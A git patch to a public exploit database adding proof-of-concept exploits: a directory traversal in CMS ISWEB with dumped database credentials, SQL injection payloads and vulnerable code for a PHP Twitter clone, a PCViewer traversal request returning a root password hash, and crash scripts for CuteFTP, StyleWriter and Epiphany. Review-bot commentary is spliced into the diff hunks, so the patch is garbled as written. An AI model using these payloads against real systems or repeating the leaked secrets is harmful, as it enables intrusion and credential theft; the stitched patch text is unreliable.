From 4d43b968d872fc6171885dbf3f97fec7b0b52cf4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 24 Aug 2018 05:01:53 +0000
Subject: [PATCH] DB: 2018-08-24
7 changes to exploits/shellcodes
CuteFTP 8.3.1 - Denial of Service (PoC)
Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
StyleWriter 4 1.0 - Denial of Service (PoC)
CMS ISWEB 3.5.3 - Directory Traversal
Twitter-Clone 1 - 'code' SQL Injection
PCViewer vt1000 - Directory Traversal
---
 exploits/linux/dos/45249.txt | 84 ++++++++++++++++++++++++++++
 exploits/php/webapps/45155.txt | 26 +++++++++
 exploits/php/webapps/45247.txt | 64 +++++++++++++++++++++
 exploits/windows/local/45171.vb | 2 +-
 exploits/windows/webapps/45248.txt | 33 +++++++++++
 exploits/windows_x86-64/dos/45246.py | 28 ++++++++++
 exploits/windows_x86/local/45250.py | 27 +++++++++
 files_exploits.csv | 6 ++
 8 files changed, 269 insertions(+), 1 deletion(-)
 create mode 100644 exploits/linux/dos/45249.txt
 create mode 100644 exploits/php/webapps/45155.txt
 create mode 100644 exploits/php/webapps/45247.txt
 create mode 100644 exploits/windows/webapps/45248.txt
 create mode 100755 exploits/windows_x86-64/dos/45246.py
 create mode 100755 exploits/windows_x86/local/45250.py
diff --git a/exploits/linux/dos/45249.txt b/exploits/linux/dos/45249.txt
new file mode 100644
index 000000000..08501cffd
--- /dev/null
+++ b/exploits/linux/dos/45249.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
+# Author: Dhiraj Mishra
+# Date: 2018-08-23
+# Software: https://projects-old.gnome.org/epiphany/
+# Version: 3.28.1
+# CVE: N/A
+# Tested on: Ubuntu 18 64bit
+
+# Steps to reproduce:
+1. Open epiphany browser
+2. Bookmark any random page
+3. Then navigate to bookmark properties set:
+ Name = Crash
+ Address = javascript:window.open('javascript:document.write("");');
+4. Browser any URL's and try to open the above bookmark
+5. The browser crashes
+
+# Below backtrace for your reference.
+
+$ gdb epiphany
+GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
+Copyright (C) 2018 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law. Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+.
+Find the GDB manual and other documentation resources online at:
+.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from epiphany...(no debugging symbols found)...done.
+(gdb) r
+Starting program: /usr/bin/epiphany
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
+[New Thread 0x7fffe08b6700 (LWP 9295)]
+[New Thread 0x7fffdee4b700 (LWP 9296)]
+[New Thread 0x7fffde64a700 (LWP 9297)]
+[New Thread 0x7fffdcdcf700 (LWP 9298)]
+[New Thread 0x7fff8fffd700 (LWP 9299)]
+[New Thread 0x7fff8f7fc700 (LWP 9300)]
+[New Thread 0x7fff8effb700 (LWP 9301)]
+[New Thread 0x7fff8e38b700 (LWP 9302)]
+[New Thread 0x7fff8db8a700 (LWP 9303)]
+[New Thread 0x7fff8d389700 (LWP 9305)]
+[New Thread 0x7fff77b0a700 (LWP 9310)]
+[New Thread 0x7fff7598c700 (LWP 9320)]
+[New Thread 0x7fff7518b700 (LWP 9321)]
+[New Thread 0x7fff7498a700 (LWP 9327)]
+[New Thread 0x7fff7698c700 (LWP 9334)]
+[New Thread 0x7fff5ffff700 (LWP 9335)]
+[New Thread 0x7fff5f7fe700 (LWP 9336)]
+[New Thread 0x7fff5effd700 (LWP 9337)]
+[New Thread 0x7fff5e7fc700 (LWP 9338)]
+[New Thread 0x7fff5dffb700 (LWP 9339)]
+[Thread 0x7fff8db8a700 (LWP 9303) exited]
+[Thread 0x7fff8e38b700 (LWP 9302) exited]
+[Thread 0x7fff5e7fc700 (LWP 9338) exited]
+[Thread 0x7fff7698c700 (LWP 9334) exited]
+[Thread 0x7fff5f7fe700 (LWP 9336) exited]
+[Thread 0x7fff5effd700 (LWP 9337) exited]
+[Thread 0x7fff5dffb700 (LWP 9339) exited]
+[Thread 0x7fff5ffff700 (LWP 9335) exited]
+Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
+[New Thread 0x7fff5ffff700 (LWP 9399)]
+[Thread 0x7fff7498a700 (LWP 9327) exited]
+[New Thread 0x7fff7498a700 (LWP 9402)]
+[Thread 0x7fff7498a700 (LWP 9402) exited]
+
+Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
+0x00007ffff7b75db7 in ?? 
() from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
+(gdb) bt
+#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
+#1 0x00007ffff7079be6 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
+#2 0x00007ffff73fe7d0 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
+#3 0x00007ffff73fde05 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
+#4 0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
+#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
+(gdb)
\ No newline at end of file
diff --git a/exploits/php/webapps/45155.txt b/exploits/php/webapps/45155.txt
new file mode 100644
index 000000000..4ad725383
--- /dev/null
+++ b/exploits/php/webapps/45155.txt
@@ -0,0 +1,26 @@
+# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
+# Date: 2018-08-01
+# Exploit Author: Thiago "thxsena" Sena
+# Vendor Homepage: http://www.isweb.it
+# Version: 3.5.3
+# Tested on: Linux
+# CVE : N/A
+
+# PoC:
+# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
+# as demonstrated by
+
+moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
+
+# Download and open it.
+$dati_db = array(
+ 'tipo' => 'mysql',
+ 'host' => 'localhost',
+ 'user' => 'networkis',
+ 'password' => 'guybrush77',
+ 'database' => 'networkis',
+ 'database_offline' => '',
+ 'persistenza' => FALSE,
+ 'prefisso' => '',
+ 'like' => 'LIKE'
+);
\ No newline at end of file
diff --git a/exploits/php/webapps/45247.txt b/exploits/php/webapps/45247.txt
new file mode 100644
index 000000000..e07c41df3
--- /dev/null
+++ b/exploits/php/webapps/45247.txt
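Review bot: The backtrace at the end of the file carries no symbols (`#0 0x00007ffff7b75db7 in () at .../libephymain.so`, after gdb reported `no debugging symbols found`), so it neither localizes the fault nor lets a maintainer confirm later that a fix addresses this crash. It should be re-captured with the distribution's debug-symbol packages for epiphany-browser and its GLib/GIO libraries installed, and the WebKitGTK version recorded next to `# Version: 3.28.1`, because the faulting thread is a GLib worker (`Thread 22 "pool"`) inside libephymain rather than the web process — which suggests, though the unsymbolized trace cannot confirm it, that the crash is in Epiphany's own handling of the bookmark rather than in the JavaScript engine. `# Tested on: Ubuntu 18 64bit` should also name the release (18.04 or 18.10) so the package versions can be reconstructed.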
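Review bot: The config dump after `# Download and open it.` reproduces what appear to be live database credentials (`'user' => 'networkis'`, `'password' => 'guybrush77'`); they should be replaced with placeholders before publication, since the presence of `$dati_db` alone demonstrates that `inc/config.php` was read. The advisory also states no remediation: `moduli/downloadFile.php` evidently uses the `file` value as given (`oggetto_documenti/../.././inc/config.php` is not normalized away), so the mitigation worth noting is resolving the requested path to its canonical form and refusing anything that resolves outside the intended download directory, or serving downloads by opaque identifier instead of by path. For detection, a web-server log filter for `..` sequences in the `file` parameter of `downloadFile.php` would flag attempts against the shown endpoint.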
@@ -0,0 +1,64 @@
+# Exploit Title: Twitter-Clone 1 - 'code' SQL Injection
+# Date: 2018-08-22
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+# vulnerable files : [mailactivation.php , stalkers.php , search.php]
+# vulnerable parameters : [name , code , id]
+
+# 1) search.php :
+# vulnerable parameter : name
+# Type : Error-based
+# Payload :
+
+%' AND extractvalue(1,concat(0x3a,database(),0x3a))%23
+
+# vulnerable code :
+if($_GET['name']!=""){
+$what = $_GET['name'];
+include "connect.php";
+$users = mysqli_query($con, "SELECT id, username, followers, following,
+tweets
+ FROM users
+ WHERE username LIKE '%$what%'
+ ORDER BY username ASC
+ LIMIT 0, 10
+");
+
+# 2) mailactivation.php :
+# vulnerable parameter : code
+# Type : Union query
+# Payload :
+
+' UNION SELECT 1,user(),3,4,5,6%23
+
+# vulnerable code :
+include "connect.php";
+$givenname = $_GET['username'];
+$givencode = $_GET['code'];
+$query = mysqli_query($con, "SELECT code, active
+ FROM users
+ WHERE code = '$givencode' AND username = '$givenname'
+ ");
+$row = mysqli_fetch_assoc($query);
+$wantedcode = $row['code'];
+
+# 3) stalkers.php :
+# vulnerable parameter : id
+# Type : Union query
+# Payload :
+
+' UNION SELECT 1,2,user(),4,5,6
+
+# vulnerable code :
+if ($_GET['id'] != "") {
+$theid = $_GET['id'];
+include "connect.php";
+$stalked = mysqli_query($con, "SELECT id, username, followers, following
+ FROM users
+ WHERE id = '$theid'
+");
+$row1 = mysqli_fetch_assoc($stalked);
+$usern = $row1['username'];
\ No newline at end of file
diff --git a/exploits/windows/local/45171.vb b/exploits/windows/local/45171.vb
index 57c4e988d..117589bcc 100644
--- a/exploits/windows/local/45171.vb
+++ b/exploits/windows/local/45171.vb
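Review bot: The title `Twitter-Clone 1 - 'code' SQL Injection` (and the matching files_exploits.csv description) names a single parameter, while the body documents three injectable parameters in three files (`name` in search.php, `code` in mailactivation.php, `id` in stalkers.php); the title or the CSV description should be widened to "Multiple SQL Injection" so the catalog reflects the scope. Every quoted snippet interpolates a `$_GET` value straight into the `mysqli_query` string and no `$givenname` check appears either, yet the advisory gives no remediation; the fix to note is a prepared statement per query, e.g. `WHERE username LIKE ?` bound via `bind_param` to the `%$what%` value, and the same for `code`, `username` and `id`. Since the project is a public repository, a CVE request would let the `# CVE: N/A` line be filled in.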
@@ -2,7 +2,7 @@
 # Date: 2018-08-08
 # Exploit Author: VortexNeoX64
 # Vendor Homepage: https://soroush-app.ir
-# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
+# Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
 # Version: 0.17.0 BETA
 # Tested on: Windows 10 1803 and windows server 2016 14393
diff --git a/exploits/windows/webapps/45248.txt b/exploits/windows/webapps/45248.txt
new file mode 100644
index 000000000..65357a50a
--- /dev/null
+++ b/exploits/windows/webapps/45248.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PCViewer vt1000 - Directory Traversal
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Hardware
+# Date: 2018-07-21
+# Vendor Homepage: N/A
+# Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml
+# Affected Version: vt1000
+# Tested on: Parrot OS
+# CVE : N/A
+
+# Proof Of Concept
+
+GET Request
+
+GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: target:8080/
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+Response
+
+HTTP/1.1 200 OK
+Server:Cross Web Server
+Content-length: 59
+Content-type: application/octet-stream
+
+root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45246.py b/exploits/windows_x86-64/dos/45246.py
new file mode 100755
index 000000000..12e773718
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45246.py
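Review bot: The replaced `# Software Link:` now points at a bare-IP host over plain HTTP (`http://54.36.43.176/SoroushSetup0.17.0.exe`) instead of the vendor domain still shown on the `# Vendor Homepage:` line above, and no checksum accompanies it, so a reader cannot verify that the download is the 0.17.0 BETA build the advisory was tested against or that it is the vendor's file at all. If the vendor's original download was withdrawn, say so in the header and pin the sample by hash, e.g. `# Software SHA-256: <installer-sha256-placeholder>`, rather than relying on an unattributed host. The rest of the file is outside this hunk.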
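Review bot: The `Response` section publishes a root password hash from the tested device (`root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh`); it should be redacted to a placeholder, since the `HTTP/1.1 200 OK` with `Content-type: application/octet-stream` and `Content-length: 59` already demonstrates the disclosure. The header is also inconsistent with the file's placement: `# Type: Hardware`, `# Vendor Homepage: N/A` and the `Server:Cross Web Server` banner describe an embedded web server, yet the file sits under exploits/windows/webapps and the files_exploits.csv row sets platform `windows`, where the neighbouring 45236 and 45242 rows use `hardware`; the Softpedia `# Software Link:` does not establish the platform either. The mitigation worth stating is canonicalizing the request path on the device and refusing anything that resolves outside the web root, and a `..` pattern in request lines to port 8080 is the corresponding detection signature.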
@@ -0,0 +1,28 @@
+# Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC)
+# Exploit Author : Ali Alipour
+# WebSite : Alipour.it
+# Date: 2018-08-22
+# Vendor Homepage : http://www.cuteftp.com/
+# Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the CuteFTP program.
+# In the new window click "File" > "Connect" > "Connect To URL" .
+# Now Paste the content of "exploit.txt" into the field: " Connect To URL ".
+# Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 7000
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45250.py b/exploits/windows_x86/local/45250.py
new file mode 100755
index 000000000..0da1e3e87
--- /dev/null
+++ b/exploits/windows_x86/local/45250.py
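Review bot: The `#!/usr/bin/python` line is placed after the comment header rather than on line 1, so it is inert and the file's 100755 mode gains nothing; exploits/windows_x86/local/45250.py has the same layout and the same two problems below. The bare `except:` swallows every exception, including KeyboardInterrupt, and prints a message that hides why the write failed; `except IOError as e:` with `print "File cannot be created: %s" % e` reports the cause, and `with open("exploit.txt", "w") as f:` makes the explicit `f.close()` unnecessary. Both scripts are Python 2 only (`print` statements), which the header should state since `/usr/bin/python` is Python 3 on current systems; `buffer` also shadows a Python 2 builtin and could simply be dropped in favour of `payload = "A" * 7000`.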
@@ -0,0 +1,27 @@
+# Exploit Title: StyleWriter 4 1.0 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-23
+# Homepage: http://www.editorsoftware.com
+# Software Link: http://www.editorsoftware.com/StyleWriter_Download.php
+# Tested Version: 1.0
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window click "Tools" >"Add Pattern...".
+# Now in the new window paste the content of
+# "exploit.txt" into the following fields:"Pattern to Find" & "Advice Message".
+# Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c28339c3..484e23d18 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6064,6 +6064,8 @@ id,file,description,date,author,type,platform,port
 45239,exploits/windows_x86-64/dos/45239.py,"UltraISO 9.7.1.3519 - Denial Of Service (PoC)",2018-08-22,"Ali Alipour",dos,windows_x86-64,
 45241,exploits/windows_x86/dos/45241.py,"Easyboot 6.6.0 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
 45245,exploits/windows_x86/dos/45245.py,"Softdisk 3.0.3 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
+45246,exploits/windows_x86-64/dos/45246.py,"CuteFTP 8.3.1 - Denial of Service (PoC)",2018-08-23,"Ali Alipour",dos,windows_x86-64,
+45249,exploits/linux/dos/45249.txt,"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)",2018-08-23,"Dhiraj Mishra",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9896,6 +9898,7 @@ id,file,description,date,author,type,platform,port
 45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86,
 45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux,
 45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
+45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39817,6 +39820,7 @@ id,file,description,date,author,type,platform,port
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
 45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
 45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
 45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
@@ -39846,3 +39850,5 @@ id,file,description,date,author,type,platform,port
 45236,exploits/hardware/webapps/45236.txt,"ZyXEL VMG3312-B10B - Cross-Site Scripting",2018-08-22,"Samet ŞAHİN",webapps,hardware,
 45237,exploits/php/webapps/45237.php,"KingMedia 4.1 - Remote Code Execution",2018-08-22,"Efrén Díaz",webapps,php,
 45242,exploits/hardware/webapps/45242.txt,"Geutebrueck re_porter 16 - Cross-Site Scripting",2018-08-22,"Kamil Suska",webapps,hardware,
+45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php,
+45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,